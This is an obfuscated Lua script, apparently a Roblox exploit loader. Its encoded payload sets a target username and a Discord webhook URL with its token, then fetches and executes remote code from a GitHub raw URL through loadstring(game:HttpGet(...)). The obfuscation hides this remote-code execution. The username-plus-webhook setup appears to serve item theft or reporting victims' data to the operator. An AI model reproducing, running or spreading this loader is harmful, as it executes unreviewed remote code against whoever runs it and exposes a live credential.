--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v69,v19);v19=nil;v75=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/(((1642 -(1523 + 114)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(957 -(892 + 65)) -0 ;local v36;local v37;while true do if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=(281 -163) -((58 -26) + (155 -70)) ;end if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (354 -(87 + 263)) ;return (v41 * 16777216) + (v40 * (65716 -(67 + 113))) + (v39 * (139 + 49 + 68)) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(954 -(802 + 150))) then v47=v20(v44,21,469 -(145 + 293) );v48=((v20(v44,(1832 -(760 + 987)) -53 )==(1487 -(998 + 488))) and  -(1 -0)) or ((1914 -(1789 + 124)) + 0) ;v42=1000 -(915 + 82) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==((769 -(745 + 21)) -0)) then if (v47==(0 + 0)) then if (v46==((409 + 778) -(1069 + (324 -206)))) then return v48 * (0 -0) ;else v47=1 -0 ;v45=859 -(814 + 45) ;end elseif (v47==(356 + 1691)) then return ((v46==((0 -0) -0)) and (v48 * ((1 + 0 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((3 -1)^(70 -(8 + 2 + 8))))) ;end if ((3 -(1057 -(87 + 968)))==v42) then v45=(6268 -4844) -(630 + 793) ;v46=(v20(v44,443 -(416 + 26) ,67 -47 ) * ((9 -7)^((93 + 9) -70))) + v43 ;v42=1 + 1 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=1414 -(447 + 966) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1583 -(1535 + 46))) then else v57=nil;v58=nil;v52=3;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52==(0 + 0)) then v53=0 + 0 ;v54=nil;v52=561 -(306 + 254) ;end if (v52==3) then v59=nil;while true do local v77=0 + 0 ;while true do if (v77==(0 -0)) then if (0==v53) then local v99=0;while true do if (v99==0) then local v108=1467 -(899 + 568) ;while true do if (v108==(0 + 0)) then v54={};v55={};v108=1;end if ((2 -1)==v108) then v99=1;break;end end end if (v99==(604 -(268 + 335))) then v56={};v53=291 -(60 + 230) ;break;end end end if (1==v53) then local v100=0;while true do if (v100~=1) then else v59={};v53=574 -(426 + 146) ;break;end if ((0 + 0)~=v100) then else v57={v54,v55,nil,v56};v58=v23();v100=2 -1 ;end end end v77=1 + 0 ;end if (v77~=(1025 -(706 + 318))) then else if (v53==3) then local v101=0;while true do if (v101~=(1251 -(721 + 530))) then else for v110=1272 -(945 + 326) ,v23() do v55[v110-(2 -1) ]=v28();end return v57;end end end if (v53~=2) then else local v102=0;while true do if (1~=v102) then else for v112=1,v23() do local v113=0;local v114;while true do if (v113==(0 + 0)) then v114=v21();if (v20(v114,701 -(271 + 429) ,1)==(0 + 0)) then local v168=1500 -(1408 + 92) ;local v169;local v170;local v171;local v172;local v173;while true do if ((1087 -(461 + 625))~=v168) then else v171=nil;v172=nil;v168=1290 -(993 + 295) ;end if (v168~=2) then else v173=nil;while true do if (v169==(1 + 1)) then while true do if (v170==2) then local v179=0;local v180;while true do if (v179~=(1171 -(418 + 753))) then else v180=0;while true do if (1~=v180) then else v170=3;break;end if (v180~=0) then else local v186=0;while true do if (0~=v186) then else if (v20(v172,1,1 + 0 )==1) then v173[1 + 1 ]=v59[v173[1 + 1 ]];end if (v20(v172,1 + 1 ,2)==(530 -(406 + 123))) then v173[1772 -(1749 + 20) ]=v59[v173[1 + 2 ]];end v186=1;end if (v186~=1) then else v180=1;break;end end end end break;end end end if (v170~=1) then else local v181=0;local v182;while true do if (v181~=0) then else v182=1322 -(1249 + 73) ;while true do if (0~=v182) then else local v187=0;while true do if (v187~=(0 + 0)) then else v173={v22(),v22(),nil,nil};if (v171==0) then local v192=0 -0 ;local v193;local v194;while true do if (v192==(1900 -(106 + 1794))) then local v196=0 + 0 ;while true do if (v196==(1 + 0)) then v192=1;break;end if (v196==0) then v193=0 -0 ;v194=nil;v196=2 -1 ;end end end if (v192~=(115 -(4 + 110))) then else while true do if (v193~=(584 -(57 + 527))) then else v194=1427 -(41 + 1386) ;while true do if (v194==(103 -(17 + 86))) then v173[3 + 0 ]=v22();v173[4]=v22();break;end end break;end end break;end end elseif (v171==(1 -0)) then v173[8 -5 ]=v23();elseif (v171==2) then v173[169 -(122 + 44) ]=v23() -((2 -0)^(52 -36)) ;elseif (v171~=3) then else local v198=0;local v199;while true do if (v198==0) then v199=0;while true do if (v199~=(0 + 0)) then else v173[1 + 2 ]=v23() -((3 -1)^(81 -(30 + 35))) ;v173[3 + 1 ]=v22();break;end end break;end end end v187=1;end if (v187==(1258 -(1043 + 214))) then v182=3 -2 ;break;end end end if (v182==(1213 -(323 + 889))) then v170=2;break;end end break;end end end if (0~=v170) then else v171=v20(v114,5 -3 ,3);v172=v20(v114,584 -(361 + 219) ,6);v170=1;end if (v170==(323 -(53 + 267))) then if (v20(v172,3,3)~=(1 + 0)) then else v173[417 -(15 + 398) ]=v59[v173[986 -(18 + 964) ]];end v54[v112]=v173;break;end end break;end if (v169~=(0 -0)) then else local v177=0;while true do if (v177~=(1 + 0)) then else v169=1 + 0 ;break;end if ((850 -(20 + 830))~=v177) then else v170=0;v171=nil;v177=1 + 0 ;end end end if (v169==(127 -(116 + 10))) then local v178=0 + 0 ;while true do if (v178==(739 -(542 + 196))) then v169=3 -1 ;break;end if (v178~=0) then else v172=nil;v173=nil;v178=1 + 0 ;end end end end break;end if (v168~=0) then else v169=0 + 0 ;v170=nil;v168=1;end end end break;end end end v53=2 + 1 ;break;end if (v102==0) then for v115=2 -1 ,v58 do local v116=0 -0 ;local v117;local v118;local v119;local v120;while true do if (v116~=(1551 -(1126 + 425))) then else v117=405 -(118 + 287) ;v118=nil;v116=1;end if (v116==(7 -5)) then while true do if (v117==0) then local v174=1121 -(118 + 1003) ;while true do if (v174~=0) then else v118=0;v119=nil;v174=1;end if (v174~=1) then else v117=1;break;end end end if (1~=v117) then else v120=nil;while true do if (v118==0) then local v175=0;while true do if (v175~=1) then else v118=1;break;end if (v175~=(0 -0)) then else v119=v21();v120=nil;v175=1;end end end if (v118==1) then if (v119==(378 -(142 + 235))) then v120=v21()~=0 ;elseif (v119==2) then v120=v24();elseif (v119==3) then v120=v25();end v59[v115]=v120;break;end end break;end end break;end if ((4 -3)==v116) then v119=nil;v120=nil;v116=1 + 1 ;end end end v57[980 -(553 + 424) ]=v21();v102=1;end end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (1==v63) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=5) then if (v91<=2) then if (v91<=0) then v82=v90[3];elseif (v91==1) then local v121;local v122,v123;local v124;local v125;v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v125=v90[2];v124=v88[v90[3]];v88[v125 + 1 ]=v124;v88[v125]=v124[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v125=v90[2];v122,v123=v81(v88[v125](v13(v88,v125 + 1 ,v90[3])));v83=(v123 + v125) -1 ;v121=0;for v153=v125,v83 do local v154=0;while true do if (v154==0) then v121=v121 + 1 ;v88[v153]=v122[v121];break;end end end v82=v82 + 1 ;v90=v78[v82];v125=v90[2];v88[v125]=v88[v125](v13(v88,v125 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];else v62[v90[3]]=v88[v90[2]];end elseif (v91<=3) then v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v82=v90[3];elseif (v91>4) then local v137=0;local v138;local v139;while true do if (1==v137) then v88[v138 + 1 ]=v139;v88[v138]=v139[v90[4]];break;end if (0==v137) then v138=v90[2];v139=v88[v90[3]];v137=1;end end else local v140=0;local v141;local v142;local v143;local v144;while true do if (v140==1) then v83=(v143 + v141) -1 ;v144=0;v140=2;end if (2==v140) then for v165=v141,v83 do v144=v144 + 1 ;v88[v165]=v142[v144];end break;end if (v140==0) then v141=v90[2];v142,v143=v81(v88[v141](v13(v88,v141 + 1 ,v90[3])));v140=1;end end end elseif (v91<=8) then if (v91<=6) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==7) then v88[v90[2]]=v62[v90[3]];else local v148=0;local v149;while true do if (v148==0) then v149=v90[2];v88[v149]=v88[v149](v13(v88,v149 + 1 ,v83));break;end end end elseif (v91<=10) then if (v91==9) then v88[v90[2]]=v90[3]~=0 ;else v88[v90[2]]();end elseif (v91==11) then do return;end else v88[v90[2]]=v90[3];end v82=v82 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D653203093O006F757467616D657334030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O002O675F6D2O6F6E363003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133353435313330343237383336383239382F47374B5A714A45382O457A4B46596D30426941504D347A636970615A2D466C623047504C507130763765326937525F616E7839557539596639504D7A494D34545268345A00173O00120C3O00013O0026063O000E0001000200044O000E000100120C000100043O001201000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026063O00010001000100044O0001000100120C0001000A3O001203000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O000B3O00017O00",v9(),...);
